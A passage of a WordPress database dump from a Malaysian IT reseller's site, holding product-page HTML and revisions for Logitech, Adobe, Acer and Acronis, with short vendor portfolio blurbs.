width=\"393\" height=\"393\" />\r\n\r\n<strong><span class=\"product-name\">SmartDock Extender Box</span></strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1391\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong>Screen Share</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1392\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong>Group Expansion Mics</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1397\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nLogitech SmartDock Flex\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1401\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nGroup 15m Extended Cable\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nGroup 10m Extended Cable\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\"><img class=\"size-full wp-image-1406 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\">MeetUp Expansion Mic</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 12:47:16','2018-12-11 04:47:16','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(1630,1,'2018-12-11 16:01:36','2018-12-11 08:01:36','<img class=\"wp-image-1603 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/adobe.png\" alt=\"\" width=\"280\" height=\"273\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software and the mobile scan app, the signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\">Acrobat Pro or Acrobat Standard desktop software â€” including future feature updates, quarterly security enhancements and improvements.</span></li>\r\n 	<li class=\"text-3-block\">Adobe Document Cloud services, which let you complete essential PDF tasks with the Acrobat Reader mobile appÂ or in your web browser, including storing and sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\">Adobe Sign subscriptionÂ â€” a swipe-and-tap solution to collect and sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe to Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\nAn Individual subscription is a single license meant for use by one user. A Team subscription allows a business to purchase more than one license and manage those license(s) among users in an admin console.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n<div class=\"text-padding-t3x dc-text\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2018-12-11 16:01:36','2018-12-11 08:01:36','',1436,'https://bintara.com.my/blog/2018/12/11/1436-revision-v1/',0,'revision','',0),(1424,1,'2018-12-11 12:48:05','2018-12-11 04:48:05','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech</h1>\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<h2 style=\"text-align: center;\">CONFERENCE CAMERAS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>\r\n\r\n<table border=\"0px\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1242 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Group</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1249 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Rally</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1316 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /><strong>Logitech MeetUp</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1318 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Connect</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech BCC950</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1321 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech PTZ Pro 2</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">VC ROOM SOLUTIONS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>\r\n<img class=\"wp-image-1327 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong><span class=\"product-name\">SMARTDOCK</span></strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">WEBCAMS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1332 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Brio</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"aligncenter wp-image-1334 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C9230e</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1336 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C925e</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">Â <img class=\"wp-image-1354 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech B525</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">HEADSETS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>\r\n<img class=\"wp-image-1364 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">VIDEO COLLABORATION ACCESSORIES</h2>\r\n&nbsp;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1386\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong><span class=\"product-name\">SmartDock Extender Box</span></strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1391\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong>Screen Share</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1392\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong>Group Expansion Mics</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1397\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nLogitech SmartDock Flex\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1401\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nGroup 15m Extended Cable\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nGroup 10m Extended Cable\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\"><img class=\"aligncenter wp-image-1406 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\">MeetUp Expansion Mic</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 12:48:05','2018-12-11 04:48:05','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(1425,1,'2018-12-11 12:51:00','2018-12-11 04:51:00','Forensic Cooperation Analysis Tool. <a href=\"https://bintara.com.my/qator-investigator/\">Read More...</a>','QATOR INVESTIGATOR','','private','closed','closed','','qator-investigator','','','2019-09-23 10:28:04','2019-09-23 02:28:04','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1425',0,'portfolio','',0),(1426,1,'2018-12-11 12:51:31','2018-12-11 04:51:31','Digital data security inspection system. <a href=\"https://bintara.com.my/qator-enterprise/\">Read More...</a>','QATOR ENTERPRISE','','private','closed','closed','','qator-enterprise','','','2019-09-23 10:27:17','2019-09-23 02:27:17','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1426',0,'portfolio','',0),(1427,1,'2018-12-11 12:51:57','2018-12-11 04:51:57','Network Attached Storage (NAS). <a href=\"https://bintara.com.my/qnap/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1837\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-111x.png\" alt=\"\" width=\"1024\" height=\"681\" />','QNAP','','publish','closed','closed','','qnap','','','2019-09-23 16:18:13','2019-09-23 08:18:13','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1427',0,'portfolio','',0),(1428,1,'2018-12-11 12:52:21','2018-12-11 04:52:21','Open Source Server, Enterprise Linux Server. <a href=\"https://bintara.com.my/redhat/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1704\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-61x.png\" alt=\"\" width=\"1024\" height=\"681\" />','REDHAT','','publish','closed','closed','','redhat','','','2019-09-23 16:17:01','2019-09-23 08:17:01','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1428',0,'portfolio','',0),(1429,1,'2018-12-11 12:52:42','2018-12-11 04:52:42','Wireless Router, Router, Wireless Access Point, Switch. <a href=\"https://bintara.com.my/ruckus/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone wp-image-1706 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-41x.png\" alt=\"\" width=\"1024\" height=\"681\" />','RUCKUS','','publish','closed','closed','','ruckus','','','2019-09-23 16:15:30','2019-09-23 08:15:30','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1429',0,'portfolio','',0),(1430,1,'2018-12-11 12:54:12','2018-12-11 04:54:12','<h1>Business Product Solution</h1>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Swift 7 Pro</b></strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr align=\"center\">\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Switch 12</b></strong>\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n\r\n<h3 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">TravelMate B</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>TravelMate Spin B1</b></strong>\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n\r\n<h3 class=\"fs-4 align-center margin-top-l\">TravelMate P</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','publish','closed','closed','','acer','','','2019-09-18 14:23:20','2019-09-18 06:23:20','',0,'https://bintara.com.my/?page_id=1430',0,'page','',0),(1431,1,'2018-12-11 12:53:14','2018-12-11 04:53:14','Business Cloud, Accounting Solutions, Business Management Solution, HR &amp; Payroll Software.\r\n\r\n<a href=\"https://bintara.com.my/sage/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1838\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Sage-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','SAGE','','publish','closed','closed','','sage','','','2019-01-03 09:55:42','2019-01-03 01:55:42','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1431',0,'portfolio','',0),(1432,1,'2018-12-11 12:53:45','2018-12-11 04:53:45','Television, Smart Television, Storage, Printers. <a href=\"https://bintara.com.my/samsung/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1707\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Samsung-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','SAMSUNG','','publish','closed','closed','','samsung','','','2019-01-03 09:56:40','2019-01-03 01:56:40','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1432',0,'portfolio','',0),(1433,1,'2018-12-11 12:54:15','2018-12-11 04:54:15','Hard Disk Drive, Solid State Drive. <a href=\"https://bintara.com.my/seagate/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1709\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Seagate-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','SEAGATE','','publish','closed','closed','','seagate','','','2019-01-03 09:59:14','2019-01-03 01:59:14','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1433',0,'portfolio','',0),(1434,1,'2018-12-11 12:54:12','2018-12-11 04:54:12','','Acer','','inherit','closed','closed','','1430-revision-v1','','','2018-12-11 12:54:12','2018-12-11 04:54:12','',1430,'https://bintara.com.my/blog/2018/12/11/1430-revision-v1/',0,'revision','',0),(1435,1,'2018-12-11 12:55:01','2018-12-11 04:55:01','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border: 1px solid #e9e9e9;\">\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Active Ransomware Protection</h3>\r\n<div style=\"margin-bottom: 25px;\">Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','publish','closed','closed','','acronis','','','2019-09-18 14:47:26','2019-09-18 06:47:26','',0,'https://bintara.com.my/?page_id=1435',0,'page','',0),(1436,1,'2018-12-11 12:55:10','2018-12-11 04:55:10','<img class=\" wp-image-1696\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Logo-Adobe-1.jpg\" alt=\"Logo Adobe\" width=\"417\" height=\"277\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software, mobile scan app, signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\"><strong>Acrobat Pro or Acrobat Standard desktop software</strong> â€” including future feature updates, quarterly security enhancements &amp; improvements.</span></li>\r\n 	<li class=\"text-3-block\"><strong>Adobe Document Cloud services</strong>Â <span class=\"text-light\">â€”</span> complete essential PDF tasks with the Acrobat Reader mobile appÂ or in web browser, including storing &amp; sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\"><strong>Adobe Sign subscription</strong>Â â€” a swipe-and-tap solution to collect, sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n\r\n&nbsp;\r\n\r\n<div class=\"text-padding-t3x dc-text\" style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','publish','closed','closed','','adobe','','','2019-09-18 14:54:18','2019-09-18 06:54:18','',0,'https://bintara.com.my/?page_id=1436',0,'page','',0),(1437,1,'2018-12-11 12:55:29','2018-12-11 04:55:29','<h1>Anydesk</h1>\r\n\r\n&nbsp;\r\n\r\n<h3 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h3>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals 